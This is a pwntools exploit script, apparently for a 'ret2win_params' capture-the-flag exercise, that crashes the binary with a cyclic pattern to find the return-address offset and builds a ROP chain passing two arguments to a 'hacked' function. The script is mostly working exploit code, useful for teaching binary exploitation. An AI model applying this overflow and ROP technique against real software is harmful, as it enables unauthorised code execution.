from pwn import *
# Path of the target binary; start() launches it (the ELF() call further
# down repeats the same path as a literal).
exe = './ret2win_params'
# Allows easy swapping between local/remote/debug modes
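def start(argv=None, *a, **kw):
    """Launch the target in GDB, remote or local mode and return the tube.

    The mode comes from pwntools' ``args`` (``GDB=1`` / ``REMOTE=1`` on the
    command line); with neither set, the binary is run as a local process.

    Args:
        argv: extra command-line arguments appended after ``exe``. ``None``
            (the default) means none. A fresh list is built on every call,
            so no list object is shared between calls as it would be with
            the previous ``argv=[]`` default.
        *a, **kw: passed through unchanged to ``gdb.debug``, ``remote`` or
            ``process``.

    Returns:
        The pwntools tube for the started target.
    """
    extra = list(argv) if argv else []
    if args.GDB:
        # The original note said "Set GDBscript below", but nothing in this
        # file sets one; a gdbscript would have to arrive through ``kw``.
        return gdb.debug([exe] + extra, *a, **kw)
    if args.REMOTE:
        # REMOTE mode takes ('server', 'port') from the script's own argv.
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + extra, *a, **kw)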
def find_ip(p):
    """Crash the target with a de Bruijn pattern and return the offset that
    reaches the saved instruction pointer.

    Sends a 200-byte cyclic pattern after the ``b':'`` prompt, waits for the
    process to die, then reads 4 bytes at the stack pointer of the resulting
    corefile and maps them back to their position in the pattern. (4 matches
    ``cyclic()``'s default subsequence length.)

    Args:
        p: a pwntools process tube that produces a corefile on crash.

    Returns:
        The integer offset into the pattern, also logged via ``info``.
    """
    pattern = cyclic(200)
    p.sendlineafter(b':', pattern)
    p.wait()
    core = p.corefile
    marker = core.read(core.sp, 4)
    offset = cyclic_find(marker)
    info('located EIP/RIP offset at {a}'.format(a=offset))
    return offset
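# Spawn the target (mode chosen by start()). Nothing below ever sends to `p`:
# the payload is only written to disk and echoed, so this process is left
# idle.
p = start()
# Reuse `exe` so the binary path is defined in one place. Assigning the ELF
# to context.binary is what gives flat() its word size and endianness.
elf = context.binary = ELF(exe, checksec=False)
# Hard-coded distance from the input buffer to the saved return address;
# find_ip() above can re-derive it from a corefile if the binary changes.
ip_offset = 24
# Every address here is absolute, so the chain is tied to this exact build
# (presumably non-PIE; any rebuild invalidates it). Each list entry becomes
# one stack slot after the overflow -- 64-bit words, judging by the
# rdi/rsi gadgets and the 8-byte constants.
payload = flat({
    ip_offset: [
        0x40124b,             # pop rdi; ret
        0xdeadbeefdeadbeef,   # Param_1 (lands in rdi)
        0x401249,             # pop rsi; pop r15; ret
        0xc0debabec0debabe,   # Param_2 (lands in rsi)
        0x41414141,           # junk, consumed by the pop r15
        # NOTE(review): this is a pwntools Function object, not a plain
        # int; it relies on flat() packing it via its address -- confirm, or
        # use elf.symbols['hacked'] for the bare address.
        elf.functions.hacked,
    ]
})
write('payload', payload)
# Echoes a python2 one-liner; in Python 3 `payload` prints as a b'...' repr.
print("$(python2 -c \"print", payload, "\")")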